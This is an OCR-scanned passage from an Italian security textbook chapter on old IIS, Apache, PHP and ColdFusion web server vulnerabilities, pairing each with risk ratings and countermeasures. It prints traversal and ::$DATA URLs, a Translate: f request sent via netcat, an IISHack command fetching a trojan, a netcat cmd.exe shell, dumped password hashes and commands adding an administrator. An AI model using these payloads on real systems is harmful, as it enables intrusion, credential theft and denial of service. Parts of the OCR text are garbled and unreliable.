gordi degli ultimi tempi, Code Red e Nimda, sfruttano entrambi vulnerabilità conte- 
nute nel software del server Web IIS di Microsoft). 
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Le vulnerabilità dei server Web possono essere classificate in una delle categorie se- 
guenti: 


e divulgazione del codice sorgente; 

e  canonicalization; 

e WebDAV; 

e overflow del buffer. 

Questo paragrafo si articola in diversi sottoparagrafi dedicati a tali argomenti. 


Divulgazione del codice sorgente 


Gli attacchi basati sulla divulgazione del codice sorgente consentono a un utente ma- 
lintenzionato di leggere il codice sorgente di file di applicazioni su un server Web vul- 
nerabile. In alcuni casi, l'aggressore può combinare questa tecnica con altre per visua- 
lizzare importanti file protetti come, per esempio, /etc/passwd, global.asa. 


@ Vulnerabilità 


di showcode.asp e codebrws.asp 
Diffusione: 3 
Semplicità: 8 
Impatto: d 
Fattore di rischio: 5 


Il primo punto debole che consente la visualizzazione dei file di cui parleremo è ti- 
pico di IIS 4.0 e consente all'hacker di scaricare il codice sorgente ASP. In questo 
caso non si tratta di un baco vero e proprio, quanto piuttosto di un esempio di cat- 
tiva programmazione: il codice campione è stato installato di default. Si tratta di una 
delle classi più comuni di vulnerabilità nei server Web. 

Se durante l'installazione predefinita di IIS 4.0, si richiede l'installazione del codice 
ASP di esempio, sulla macchina vengono riportati file sviluppati in modo perlome- 
no discutibile, che permettono all’hacker di scaricarne i sorgenti. Il problema è lega- 
to all’incapacità, da parte dello script, di limitare l'utilizzo di ".." nella definizione 
del percorso del file. Per esempio, il seguente exploit showcode.asp visualizza il 
contenuto del file boot.ini del sistema interessato. (Se il controllo sugli accessi 
non è rigoroso, questa tecnica permette di visualizzare qualsiasi file.) 


http://192.168.51.101/msadc/Samples/SELECTOR/showcode.asp?source=/../.. 
/I../..1../boot.ini 


Come per showcode . asp, l’exploit ottenuto con il file codebrws.asp consente di vi- 
sualizzare qualsiasi file memorizzato sull'unità locale. Come già detto nel Capitolo 
13, è possibile individuare i file CIF degli utenti pcAnywhere: 


http://192.168.51.101/iissamples/exair/howitworks/codebrws.asp?source= 
I..t..1x.1..|../Winnt/repair/setup.log 


Questo problema è emerso solo dopo un certo tempo. codebrws.asp ha fatto la sua 
comparsa anche in IIS 5.0, nella directory degli script campione (/IISSAMPLES). 
Tuttavia questo script (CodeBrws.asp) non filtra in modo adeguato le rappresenta- 
zioni Unicode degli attraversamenti delle directory. Per esempio, un aggressore può 
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uscire dalla directory degli script campione sostituendo %c0%ae%c@%ae a .. in un 
attacco “punto-punto-barra” di attraversamento delle directory: 


http://localhost/iissamples/sdk/asp/docs/CodeBrws.asp?Source= 
JIISSAMPLES/%c0%ae%c0%ae/default.asp 


Occorre sottolineare che un aggressore può anche creare una mappa della struttura 
delle directory del server Web richiedendo file con URL simili a questo. Si verifiche- 
ranno errori qualora le ipotesi sul percorso o sul nome del file non siano corrette. 


= Se sono presenti entrambe le vulnerabilità spowcode.asp e codebnws.asp è 
impossibile scaricare in modo corretto i file eseguibili dal sistema obiettivo: 
questo è dovuto alla tipica traduzione seguita dallo script ASP. La traduzio- 

ne dei caratteri di un file come SAM._ corrompe il file rendendolo inutiliz- 

zabile: questo potrebbe anche non fermare un hacker esperto, che può esse- 

re in grado di ricostruire il file SAM e utilizzare l'informazione recuperata. 


Contromisura a showcode.asp e codebrws.aso 


Evitate innanzitutto di installare file campione sui server Web di produzione! La pa- 
tch e il relativo articolo nella Knowledge Base (0232449) sono disponibili al sito 
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/Viewcode-fix/. 
Non esiste, invece, una patch per IIS 5.0, per cui dovete semplicemente eliminare il 
file codebrws.asp (per ulteriori informazioni, consultate il sito http://online.se- 
curityfocus.com/bid/4525/). 


® Divulgazione del codice sorgente JSP di Apache e BEA 


Diffusione: 6 
Semplicità: 8 
Impatto: 4 
Fattore di rischio: 6 


Questa serie di vulnerabilità è piuttosto simile a quella della divulgazione del codice 
sorgente +.htr in IIS 5.0, di cui si è parlato nel Capitolo 5. Così come per l’accodamen- 
to di +.htr a una richiesta di file Microsoft ASP (Active Server Pages), quando si acco- 
dano speciali caratteri a richieste di JSP (Java Server Pages) su server Web Weblogic di 
BEA o Tomcat di Apache, viene restituito il codice sorgente della JSP al posto dell’out- 
put riprodotto dinamicamente della pagina. Ecco alcuni esempi di URL: 
http://ww.weblogicserver.example/index.js%70 
http://ww.tomcatserver.example/examples/jsp/num/numguess.js%70 


Contromisure alla divulgazione del codice JSP 


In Apache Tomcat 4.0 Beta 3 e nelle versioni successive si è cercato di eliminare 
questo baco (http://jakarta.apache.org). Nel caso di BEA Weblogic, procurate- 
vi la patch opportuna per la vostra versione dal comunicato “BEA02-03.03” disponi- 
bile all'indirizzo http://dev2dev.bea.com/resourcelibrary/advisories.jsp? 
highlight=advisoriesnotifications. 
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Attacchi di canonicalization 


Spesso le risorse di computer e di rete possono essere indirizzate mediante diversi 
tipi di rappresentazione. Per esempio, è possibile accedere al file C:\text.txt me- 
diante la sintassi ..\text.txt o \\computer\C$\text.txt. La risoluzione di una 
risorsa su un nome standard, o nome canonico, è detta canonicalization. Le applica- 
zioni contenenti meccanismi decisionali basati sul nome della risorsa possono esse- 
re facilmente tratte in inganno e indotte a effettuare azioni impreviste, mediante i 
cosiddetti attacchi di canonicalization. 


® Vulnerabilità di ASP::$DATA 


Diffusione: 6 
Semplicità: 8 
Impatto: 4 
Fattore di rischio: 6 


Questo problema, rilevato inizialmente da Paul Ashton su BugTraq, anziché fare in 
modo che le pagine ASP siano riprodotte dinamicamente dal motore ASP di IIS, 
consente all’hacker di scaricare i sorgenti ASP delle pagine Web. L'exploit si è diffu- 
so rapidamente grazie alla sua semplicità. È sufficiente utilizzare il seguente URL 
per la richiesta di una pagina ASP: 


http://192.168.51.101/scripts/file.asp::SDATA 


Se l’exploit funziona, il browser Netscape chiede dove salvare il file, mentre Inter- 
net Explorer di default ne mostra il contenuto nella finestra del browser. Una volta 
salvato il file, è possibile esaminarlo con un qualunque editor di testo. 

Per maggiori informazioni su questo problema, vi rimandiamo a http://ww. 
online.securityfocus.com/bid/149. 


© Contromisure per ASP::$DATA 


Procuratevi la patch opportuna per la vostra versione di IIS (non dimenticate di ap- 
plicare la patch a Personal Web Server se eseguite NT Workstation, Windows 2000 
Professional, o Windows XP). IIS 5.0 e le versioni successive non sono vulnerabili a 
questo baco. Se eseguite IIS 4.0, scaricate l’ultima rollup (o patch cumulativa) per 
IIS all'indirizzo http://www.microsoft.com/technet/security/current.asp. 


Vulnerabilità di Web DAV 


WebDAV (Web Distributed Authoring and Versioning) è un'estensione del proto- 
collo HTTP. Sostanzialmente, WebDAV consente il Web authoring distribuito trami- 
te una serie di header e metodi HTTP che possono creare, copiare, cancellare, spo- 
stare o cercare risorse, nonché definire e cercare proprietà di risorse. Come potete 
immaginare, queste funzionalità sono molto pericolose se cadono nelle mani sba- 
gliate (in quelle di un hacker malintenzionato). In questo paragrafo sono presentati 
alcuni esempi di abusi di implementazioni comuni del WebDAV. Mentre scriviamo, 
il WebDAV di Microsoft è l'implementazione maggiormente attaccata, poiché è inte- 
grata in Web Server di Microsoft versione 5 e successive. 
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® Vulnerabilità ‘Translate: f”’ di IIS 5 


Diffusione: 5 
Semplicità: 9 
Impatto: + 
Fattore di rischio: 6 


I punti deboli di IIS del tipo showcode continuano a presentarsi. Il problema Tran- 
slate: f, di cui ha parlato in Bugtraq Daniel Docekal, è un esempio particolarmen- 
te chiaro di cosa succede quando un hacker invia un input inatteso, costringendo il 
server Web a fornire un file che normalmente non fomirebbe; questo è il classico 
attacco verso protocolli di servizio di documenti come HTTP. 

La vulnerabilità Translate: f è utilizzata inviando una richiesta HTTP GET scorret- 
ta, per uno script lato server eseguibile o un tipo di file correlato (per esempio Acti- 
ve Server Pages, .ASP o global.asa). Questi file sono ideati per essere eseguiti sul 
server e non per essere lanciati sul client. La richiesta induce IIS a inviare il contenu- 
to del file al client remoto, invece di eseguirlo utilizzando l’adeguato file di scrip- 
ting. 

Gli aspetti chiave della richiesta HTTP GET includono un titolo specializzato con 
Translate: f alla fine e un backslash (\) apposto alla fine dell’URL specificato nel- 
la richiesta. Di seguito viene mostrato un esempio. (La notazione [CRLF] rappresen- 
ta i caratteri del tasto di ritorno carrello/avanzamento linea, 0D 0A in esadecimale, 
che di solito non sarebbe visibile.) Notate il backslash trailing dopo GET glo- 
bal.asa e il titolo Translate: f: 


GET / global.asa\ HTTP/1.0 

Host: 192.168.20.10 

User-Agent: SensePostData 

Content-Type: application/x-www-form-urlencoded 
Translate: f 

[CRLF] 

[CRLF] 


Inviando un file contenente questo testo attraverso netcat a un server vulnerabile, 
come illustrato di seguito, il file /global/.asa è visualizzato sulla riga di comando: 


D:\>type trans . txt | nc -nvv 192.168.234.41 80 
(UNKNOWN) [192.168.234.41] 80 (?) open 
HTTP/1.1 200 OK 

Server: Microsoft-IIS/5.0 

Date: Wed, 23 Aug 2000 06:06:58 GMT 
Content-Type: application/octet-stream 
Content-Length: 2790 

ETag: "0448299fcd6bf1:bea" 

Last-Modified: Thu, 15 Jun 2000 19:04:30 GMT 
Accept-Ranges: bytes 

Cache-Control: no-cache 


<!-Copyright 1999-2000 bigCompany.com - - > 
("ConnectionText") = "DNS=Phone; UDI=superman; Password=test;" 
("ConnectionText") = " DNS=Backend; UDI=superman; PWD=test" 


("LDAPServer") = "LDAP://ldap.bigco.com:389" 
("LDAPUserID") = "cn=Admin" 
("LDAPPwd") = "password" 
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Abbiamo editato i contenuti del file global.asa recuperati in questo esempio per mo- 
strare alcuni dei contenuti più interessanti nei quali un hacker può imbattersi. Pur- 
troppo è vero che molti collocano password di applicazione hard-code in file .ASP e 
«ASA e questo si verifica dove il rischio di penetrazione è maggiore. Come si può ve- 
dere dall’esempio precedente, l’hacker che ha ottenuto questo specifico file .ASA si è 
guadagnato delle password per molteplici server back-end tra cui un sistema LDAP. 
Su Internet sono disponibili degli script Perl di exploit che semplificano i precedenti 
basati su netcat (abbiamo usato .pl fornito da Roelof Temmingh e sregrab. pl for- 
nito da Smiler). 

Translate: f nasce da un problema con il WebDAV, che viene implementato come 
un filtro ISAPI chiamato httpext.dIl e interpreta le richieste del Web prima che lo fac- 
cia il core del motore IIS. Il comando Translate: f segnala al filtro WebDAV di ge- 
stire la richiesta, mentre i backslash che seguono confondono il filtro, in modo che 
questo invii la richiesta direttamente al sistema operativo sottostante. Windows 2000 
fortunatamente restituisce il file al sistema dell’hacker, invece di eseguirlo sul server. 
Questo rappresenta anche un altro esempio di un problema di canonicalization 
(di cui abbiamo parlato in precedenza in questo capitolo). 

Specificare una delle forme equivalenti di un nome di file canonico in una richiesta 
potrebbe avere come effetto la gestione delle funzionalità di IIS o del sistema ope- 
rativo. La vulnerabilità ::$DATA, precedentemente menzionata, è un buon esempio 
di problema di canonicalization: richiedere lo stesso file con un nome differente fa 
sì che il file venga restituito al browser in un modo inaspettato. 

Sembra che Translate: f lavori in modo simile: confondendo WebDAV e specifi 
cando “false” per translate, il flusso del file viene restituito al browser. 


Contromisure per “Translate: f”? 


Un buon modo per gestire il rischio posto da Translate: f consiste nel presuppor- 
re che ogni file lato server eseguibile su IIS sia visibile agli utenti Internet e non me- 
morizzare mai informazioni sensibili in questi file. Non siamo sicuri che ciò dipenda 
dal fatto che le vulnerabilità showcode compaiono così spesso ma, a ogni modo, 
Microsoft consiglia questa condotta come se si trattasse di una “normale raccoman- 
dazione di sicurezza”, nel suo bollettino dedicato a questo argomento. 

Ovviamente, Microsoft consiglia di scaricare la patch (inclusa anche nel Service Pack 
1 di Win 200) dal sito ww.microsoft.com/technet/security/bulletin/MS00- 
058.asp. Essa presumibilmente fa in modo che IIS interpreti uno script lato server 
eseguibile, e tipi di file correlati, utilizzando l’adeguato interprete di scripting lato ser- 
ver, indipendentemente dal comando che viene inviato. 

Come evidenziato da Russ Cooper di NT Bugtrag, quando si traffica con Transla- 
te: f devono essere presi in considerazione importanti problemi relativi al control- 
lo delle versioni dei sistemi operativi: una patch precedente per IIS 4, per esempio, 
in effetti risolve il problema. Riassumendo: 


e un problema correlato con IS 4.0/II$ 5.0 e le directory virtuali su UNC vie- 
ne gestito con MS00-019 e, di conseguenza, i sistemi IIS 4 non sono attacca- 
bili, a patto che sia stato applicato questa patch più vecchia; 
e isistemi IIS 5.0 (con o senza MS00-019) trovano soluzione con SP1, 0 
MS00-058. 
Notate che se dei permessi di accesso sulla directory virtuale IIS (che contiene il file 
bersaglio) vengono impostati a qualcosa di più ristretto che Read, verrà comunque 
inviato un messaggio di errore “HTTP 403 Forbidden” agli attacchi di Translate: f 
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(anche nel caso in cui sia abilitata l'opzione Mostra Codice Sorgente). Se nelle di- 
rectory virtuali che contengono file avanzati vengono impostati a Read i permessi di 
accesso, questi saranno probabilmente visibili a questo exploit. 

Un ultimo consiglio: prendete in seria considerazione l’ipotesi di disattivare WebDAV 
su IIS 5 se non lo state utilizzando. L'articolo di Microsoft Knowledge Base che potete 
leggere all'indirizzo http://support.microsoft.com/default.aspx?scid=KB;EN- 
US; 0241520& spiega come procedere. 


Buffer overflow 


Come abbiamo rilevato in diverse parti di questo libro, il temuto attacco basato 
sull’overflow del buffer rappresenta il colpo di grazia dell’hacker. In opportune 
condizioni, gli overflow del buffer consentono di eseguire comandi arbitrari sulla 
macchina violata, generalmente con livelli di privilegio molto elevati. 

Gli overflow del buffer sono, da molti anni, una spina nel fianco della sicurezza di- 
gitale. Dopo che Dr. Mudge ha trattato questo argomento in un saggio del 1995 
(How to write buffer overflous, disponibile sul Web all'indirizzo http://www. inse - 
cure.org/stf/mudge_buffer_overflow_tutorial.html), il mondo della sicurez- 
za del computer non è stato più lo stesso. L'articolo del 1996 di Aleph One, 
“Smashing the Stack for Fun and Profit”, originariamente pubblicato sul numero 49 
di Pbrack Magazine (http://www. phrack. com), è un altro classico e spiega in det- 
taglio quanto sia semplice mandare in overflow un buffer. Un eccellente sito per ri- 
ferimenti di questo genere è http://destroy.net/machines/security/. 

Gli attacchi di tipo buffer overflow più facili da realizzare sono i cosiddetti sovracca- 
richi del buffer basati sullo stack, che prevedono l'inserimento di un codice arbitra- 
rio nello stack di esecuzione della CPU. Più di recente, si sono diffusi anche i cosid- 
detti overflow del buffer basati sull'heap, che prevedono l’iniezione del codice 
nell’heap e la sua esecuzione. 

Il software di un server Web non è diverso da qualsiasi altro software, per cui an- 
ch’esso è potenzialmente vulnerabile rispetto agli errori comuni di programmazione 
che sono la causa principale degli overflow del buffer. Purtroppo, data la sua posi- 
zione di prima linea nella maggior parte delle reti, gli overflow del buffer nel soft- 
ware del server Web possono avere effetti realmente devastanti, consentendo 
all’aggressore di passare con facilità da una semplice compromissione alla periferia 
a una penetrazione in profondità nel cuore di un’organizzazione. Pertanto consi- 
gliamo di prestare particolare attenzione agli attacchi descritti in questo paragrafo, 
poiché sono quelli da evitare a ogni costo. 


O Vulnerabilità di PHP 


Diffusione: 5 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 7 


All’interno degli script PHP sono stati trovati due (o, forse, più) punti deboli, Il pri- 
mo éra un tipico caso di mancata validazione dell'input (piuttosto comune a quei 
tempi negli script), che permetteva all’hacker di visualizzare qualsiasi file sul siste- 
ma. Per maggiori informazioni su questo problema, consultate http://oliver. 
efri.hr/-crv/security/bugs/mUNIXes/httpd13.html. 
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Il secondo problema, decisamente più interessante, è stato scoperto nell'aprile del 
1997 dal gruppo Secure Networks Inc. e riguardava una condizione di overflow del 
buffer nello script php.cgi, contenuto nelle versioni fino alla 2.0beta10 del server 
NCSA HTTPD. Tale problema si verifica quando l’hacker passa una stringa molto 
lunga alla funzione FixFilename( ), che utilizza i parametri dello script, sovrascri- 
vendo lo stack della macchina: in questo caso diventa possibile eseguire un codice 
arbitrario sul sistema locale. Per maggiori informazioni sulla vulnerabilità da over- 
flow del buffer, vi rimandiamo al sito http://oliver.efri.hr/-crv/security/ 
bugs/mUNIXes/httpd14.html. 


DÌ Contromisure per PHP 


Esistono sostanzialmente due modi per prevenire gli attacchi agli script PHP: 
e eliminare gli script vulnerabili; 
e aggiornare il sistema all'ultima versione di PHP, che risolve il problema. 


® Vulnerabilità di wwwcount.cgi 


Diffusione: 5 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: + 


Il programma wwcount .cgi è un contatore di accessi Web piuttosto diffuso. Il pun- 
to debole e il relativo exploit sono stati pubblicizzati inizialmente da plaguez nel 
1997. Il problema consente all'hacker remoto di eseguire qualsiasi codice sul siste- 
ma locale (come sempre, utilizzando l’utente di HTTPD). Sono disponibili almeno 
due exploit dimostrativi, che fondamentalmente fanno la stessa cosa: aprono una 
sessione xterm verso la macchina dell’hacker. 

Per maggiori informazioni su questo problema e una possibile soluzione, potete 
consultare due siti, rispettivamente agli indirizzi http://oliver.efri.hr/-crv/ 
security/bugs/mUNIXes/wwwcount.html e http://oliver.efri.hr/-crv/secu- 
rity/bugs/mUNIXes/wwwcnt2.html. 


Contromisure per wwwcount.cgi 

Esistono sostanzialmente due modi per impedire lo sfruttamento dei punti deboli 

dello script wwwcount: 

e climinare lo script incriminato, wwcount .cgi; 

e eliminare idiritti di esecuzione sullo script utilizzando il comando chmod -x 
wwwcount.cgi. 


1) Vulnerabilità IISHack per IIS 4.0 


Il tristemente noto hack per Microsoft IIS 4.0 è stato reso pubblico nel giugno del 
1999 e ha messo a nudo un preoccupante punto debole del server Web di Micro- 
soft. Il problema è stato scoperto dal gruppo di esperti di sicurezza eEye, che ha 
pubblicato anche il codice e l'eseguibile per l'exploit. La causa del problema è la 
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verifica solo parziale delle dimensioni dei nomi negli URL di file .HTR, .STM e .IDC, 
che permette all’hacker di introdurre il codice dannoso ed eseguire comandi arbi- 
trari sul sistema locale, agendo come utente Administrator. 

Il programma di sfruttamento del punto debole, IISHack, è disponibile anche al sito 
http://ww.technotronic.com. Per funzionare, l’exploit invia l'URL insieme con il 
nome del file contenente il trojan da eseguire: 


C:\nt\>iishack 10.12.24.2 80 172.29.11.101/getem.exe 

=> (IIS 4.0 remote buffer overflow exploit)---------......... 
(c) dark spyrit -- barns@eeye.com. 

http://www.eEye.com 


[usage: iishack <host> <port> <ur1l>] 
eg - iishack www.example.com 89 www.myserver.com/thetrojan.exe 
do not include 'http://' before hosts! 


Data sent! 


Il trojan getem. exe è un semplicissimo programma che abbiamo realizzato noi stes- 
si, che installa pwdump. exe (il programma per il download del SAM di NT), lancia 
una versione modificata di netcat in ascolto sulla porta 25 e restituisce un prompt 
di comando (ne -nvv -L -p 25 -t -e cmd.exe). Una volta completata con succes- 
so la procedura, è sufficiente eseguire il comando netcat per ottenere un prompt 
di comando, che consente di accedere al sistema utilizzando l'account SYSTEM (so- 
stanzialmente, l'utente Administrator): 


C:\>nc -nvv 10.11.1.1 26 

(UNKNOWN) [10.11.1.1] 26 (?) open 
Microsoft(R) Windows NT(TM) 

(C) Copyright 1985-1996 Microsoft Corp. 


C:>pwdump 

administrator:500:D3096B7CD9133319790F5B37EAB66E30 :5ACA8A3A546DD587A 
58A251205881082:Built-in account for administering the computer/doma 
ans: 

Guest:501:NO PASSWORD #88 de sede ne ene needed NO PASSWORD*********%* 44% 
*******:Built-in account for guest access to the computer/domain:: 
sqldude:1000:853FD8D0FA7ECFOFAAD3B435B51404EE : EE319BA58C3E9BCB45AB13 
0D7651FE14::: 
SQLExecutiveCmdExec:1001:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805 
F797BF2A82807973B89537:SQOLExecutiveCmdExec,SQL Executive CmdExec Tas 
k Account:C_: 


A questo punto, bastano un semplice copia e incolla dalla shell di comando, e un 
po’ di aiuto da parte di LOphtCrack, per decifrare gli hash e ottenere la password di 
Administrator (e quella di chiunque altro sul sistema). 

Un attacco ancora più semplice, ma meno discreto, potrebbe consistere nella crea- 
zione di un nuovo utente sul sistema, con il comando net localgroup password 
username /add, e nella sua aggiunta al gruppo Administrators con il comando net 
localgroup Administrators username /add: se la porta NetBIOS (TCP 139) del 
server è aperta, l'hacker si può collegare per eseguire qualsiasi attività. Ovviamente, 
in questo caso l'hacker apporta al sistema modifiche significative, rilevabili con 
qualsiasi controllo di routine. 
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Contromisure a IIS 4.0 IISHack 


Inizialmente Microsoft ha proposto un rimedio per aggirare il problema, ma successi- 
vamente ha rilasciato una patch, disponibile su ftp://ftp.microsoft.com/bussys/ 
IIS/iis-public/fixes/usa/ext-fix/. Anche il gruppo eEye ha rilasciato una pa- 
tch, ma si consiglia sempre di preferire gli aggiornamenti del produttore. 


CD) Buffer overflow dell’ISAPI idq.dil di Index Server 


Diffusione: 9 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 9 


Solo il terzo overflow del buffer IIS, ISAPI idq.dl1, è davvero dannoso. Questa vul- 
nerabilità, scoperta da Riley Hassell (di eEye) e documentata il 18 giugno 2001, riguar- 
da sia IIS 4.0 sia IIS 5.0 e consente a un hacker di eseguire arbitrariamente comandi 
come l'account Local System (che è molto influente sulla macchina locale). Per questo 
baco sono stati rilasciati solo due exploit poco stabili. Di conseguenza dovreste essere 
a conoscenza della vulnerabilità ed eseguire i successivi passaggi, per poter rimediare. 
Il worm Codice Rosso, basato su un exploit dell’overflow del buffer idq.dl1, ha cre- 
ato nuove intestazioni in mid-2001, mettendo fuori uso sistemi Windows 2000 per di- 
verse settimane. La prima versione del worm è stata indirizzata all'indirizzo IP della 
residenza esecutiva del governo degli Stati Uniti, whitehouse.gov, costringendola a 
cambiarlo per sottrarsi agli attacchi di migliaia di sistemi infettati. Le versioni successi- 
ve hanno reinstallato le porte di controllo remoto e compromesso centinaia di miglia- 
ia di server, tra cui quelli delle istituzioni di alto livello quali AT&T, Microsoft e FedEx 
Corp. 

Come tutti gli exploit dell’overflow del buffer discussi in questo capitolo, le vulnera- 
bilità ISAPI idq.dll consentono a un hacker di cambiare i file sul vostro server 
Web, permettendogli di ottenere una shell di comando con una sessione netcat o 
altre connessioni TCP, UDP o ICMP. Questo punto debole è importante, in quanto 
interessa molte versioni del server Web. Per maggiori informazioni al riguardo, visi- 
tate il sito http://www.securityfocus.com/bid/2880. 


© Contromisure per l’ISAPI idq.dil di Index Server 


La migliore contromisura a breve termine consiste nell’applicare le patch di Micro- 
soft. Per Microsoft NT 4.0 (IIS 4.0), potete visitare il sito http://www.micro- 
soft.com/technet/security/bulletin/MS01-033.asp. 

Supponete che installare le patch che un fornitore vi ha procurato vi renda nervosi, 
o che vogliate testare la patch in un sistema non produttivo prima di renderla appli- 
cativa. Nello stesso tempo, potete rimuovere in maniera semplice la mappatura IDQ 
(dando per scontato che non la state usando nella vostra applicazione Web). Que- 
ste DLL sono state fornite per eseguire la rimappatura quando state aggiornando al- 
tri sistemi, pertanto la scelta migliore è aggiornare con una patch. 

Nonostante questo problema, la migliore strategia a lungo termine per difendersi 
dagli attacchi di questo tipo consiste nel rimuovere le mappature di estensione per 
tutte le DLL che non sono ancora state usate (questa nei cinque anni passati è stata 
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la raccomandazione fondamentale del Microsoft Secure Internet Information Servi- 
ces 5.0 Checklist). Quindi, evitando di contare sull’aggiornamento costante delle 
patch (che possono o non possono essere emesse in tempo) vi difenderete fin 
dall'inizio. 

ER Si veda Windows 2000 la sicurezza, Apogeo, 2000, per una trattazione ap- 
Rg profondita delle nuove incursioni di backer e contromisure per IS. 


C) Vulnerabilità dell’overflow dei campi Web 


Diffusione: 7 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 8 


Tutti ci domandano se è davvero possibile causare il crash di un server Web utilizzan- 
do solo un browser Web. La risposta è “Sì”, I programmatori Web mettono in genere 
la funzionalità davanti alla sicurezza e l’overflow ColdFusion scoperto da Foundstone 
illustra chiaramente questo concetto. Il problema risiede nel modo in cui Allaire/Ma- 
cromedia ha scritto il componente di validazione dell'input del campo utilizzato per la 
password del server Administrator, che consente a un hacker di provocare il crash di 
un intero server Web utilizzando solo un semplice browser. Di seguito ne è spiegato 
il funzionamento, 


1. Accedete con il browser alla pagina di autenticazione dell'’amministratore di 
un tipico server ColdFusion. 


Bookmarks AH Location [htin://152 168.51 101/chie/admristrto/indecim — 


<allalre> 


ÈSSOLDFUSION 0 


web application server 


eee —> a 


In order to access the administrative functions on 
this ColdFusion server you nesd to login using the 
administrator password 


2. Attivate la modalità di modifica del codice HTML, utilizzando l'opzione File 
| Edit Page (in Netscape). 
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3. Viene visualizzato il layout di pagina e i tag HTML riportati di seguito. 


usion Administrato; Login ; http //192 16 tor/index cfm 


Insert Farmet Lol Communicator Help 


<allalre» 


Lar i 


OLDFUSION 4.0 


web application server 


ss Ihe administratme functions on 
er you need to lagin using the 
art 


4. Modificate il tag ACTION (angolo superiore sinistro), facendo doppio clic 
su di esso e facendo precedere l’URL dal nome/indirizzo del server, come 
descritto qui di seguito: 


<form Action="http://192.168.51.101/CFIDE/administrator/index.cfm" 
Method="POST"> 


5. Modificate le proprietà dimensione e lunghezza massima del tag HTML che 
contiene la password, denominato PasswordProvided. 


<input Name="PasswordProvided" Type="PASSWORD" Size="1000000" 
MAXLENGTH="1000000"> 


6. Fate clic sul pulsante Preview e salvate il file nel formato HTML. 


7. Il campo password dovrebbe estendersi sulla destra oltre la dimensione 
dello schermo: generate all’incirca 1.000.000 di caratteri e inseriteli nel cam- 
po password. 


RN L'operazione precedente provoca il blocco del sistema, perché la percentuale 
Ro di utilizzo della CPU sale al 100%. Se continuate a inviare queste richieste, la 
memoria sarà insufficiente per processarle. Tuttavia, la sola spedizione di più 

di un miliardo di caratteri al server ne provoca il crash istantaneo. In en- 

trambi i casi, si deve riavviare il sistema per ripristinare la situazione iniziale. 
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Coldf usion Admmistrator Login - Netscape 


BW BA: Vu! fo, Lonmricnta > He 


a è iù m don 


“ Back forwari Reload Home Search Netscape Pim Seculiy = Shop Stop 
uf” Bookmarks £ Location: 


LC e nt ee 


it 


web application server 


FETRETTTTTTAATERARARARARAREAEERIFBARTERTTERTERTTERETARTERETTATEAAERAEAAAETTTHATRAAARAENAN 


Password 


istratre functions 


you need? 


In orderto access the adr 
oldFusion serve 
Using the administr 


on thi 


ator password 


8. Fate clic sul pulsante Password. Se tutto va bene (0 male, se siete l’amministra- 
tore del sistema), sul sever target viene visualizzato il risultato seguente. 


£ Windows NT Task Manager 


Processes: 28 [CPU Usage 100% |Mem Usage: 116112K / 374296K 4 


O Contromisura all’overflow dei campi Web 


L'unica soluzione al problema consiste nell’utilizzare una routine di validazione 
dell'input in ogni programma che sviluppate. Per questa vulnerabilità di Cold Fu- 
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sion, potete spostare la pagina Administrator in una directory alternativa (che però 
è solo un nascondiglio), o consultare le raccomandazioni sulla sicurezza all’indiriz- 
zo http://ww.Macromedia.,com/Handlers/index.cfm?ID=10954&Method= Full. 


Altri gravi buffer overflow 


Potremmo parlare ancora per molte pagine di overflow del buffer simili a quelli già 
visti, ma vi risparmieremo limitandoci a riassumere le caratteristiche di alcuni di 
quelli più gravi. 

La vulnerabilità IIS HTR Chunked Encoding Transfer Heap Overflow riguarda Mi- 
crosoft IIS 4.0, 5.0 e 5.1. Essa può condurre al DoS remoto o all'esecuzione di codi- 
ce remoto con livello di privilegio IWAM_NOMEMACCHINA. Un attacco che sfrutta 
questa vulnerabilità è dettagliatamente spiegato all'indirizzo http://packetstorm- 
security.nl/0204-exploits/iischeck.pl. 

La vulnerabilità Apache OPENSSL SSLv2 Malformed Client Key Remote Buffer Over- 
flow (nota anche come Slapper worm) rigurda tutte le versioni di Apache fino alla 
2.0.40 e si traduce nell'esecuzione remota del codice a livello di privilegio 
IWAM_NOMEMACHINA su IIS. La descrizione di un attacco di questo tipo è dispo- 
nibile agli indirizzi seguenti: 

e http://packetstormsecurity.n1/0209-exploits/apache-linux.txt 

e http://packetstormsecurity.n1/0209-exploits/apache-ssl-bug.c 


e http://packetstormsecurity.n1/0209-exploits/openssl-too- 
open.tar.gz 

Gli scanner sensibili a questa vulnerabilità sono disponibili agli indirizzi seguenti: 

e http://packetstormsecurity.n1/0209-exploits/apscan2.tgz 

e http://packetstormsecurity.n1/0209-exploits/openssl-bsd.c 

Potete trovare un attacco per la versione Linux di questo worm all'indirizzo http: // 

packetstormsecurity.nl/0209-exploits/bugtragworm.tgz. 

La vulnerabilità Chunked Encoding Memory Corruption (Apache worm) riguarda 

tutte le versioni di Apache fino alla 2.0.36 inclusa e si manifesta con l'esecuzione re- 

mota di codice con livello di privilegio IVAM_NOMEMACCHINA su IIS. La descri- 

zione di alcuni di questi attacchi è disponibile sui siti elencati di seguito: 
http://packetstormsecurity.n1/0206-exploits/apache-scalp.c 


e http://packetstormsecurity.n1/0206-exploits/apachefun.tar.gz 
e http://packetstormsecurity.0rg/0206-exploits/apache-nosejob.c 
e http://packetstormsecurity.0rg/0206-exploits/apache-nosejob.zip 


Vulnerabilità di Cold Fusion 


LOpht ha scoperto diversi punti deboli significativi all’interno di Cold Fusion Applica- 
tion Server di Allaire, permettendo l'esecuzione da remoto di comandi su un server 
Web vulnerabile. Quando viene installato, infatti, il prodotto riporta esempi di codice 
e documentazione in linea. Il problema risiede in alcuni di questi file di esempio, che 
non limitano la propria interazione al solo localhost. 


D9 Nel 2001, Macromedia ha acquistato Allaire e ora Cold Fusion Web appli- 


cation server è un prodotto Macromedia. 
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® Attacco a openfile.cfm 


Diffusione: > 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 9 


Il primo difetto risiede nel file openfile.cfm, che permette all’hacker di caricare sul 
server Web qualsiasi file. openfile.cfm realizza l'installazione del file locale sul server 
Web, ma il file displayopenedfile.cfm visualizza in realtà il file sul browser. In se- 
guito, exprcalc.cfm esegue una verifica sul file visualizzato e lo elimina (0, almeno, 
dovrebbe eliminarlo). Utilizzando solo openfile.cfm, è possibile ingannare il sistema 
in modo che non elimini il file ed esegua successivamente qualsiasi comando sul siste- 
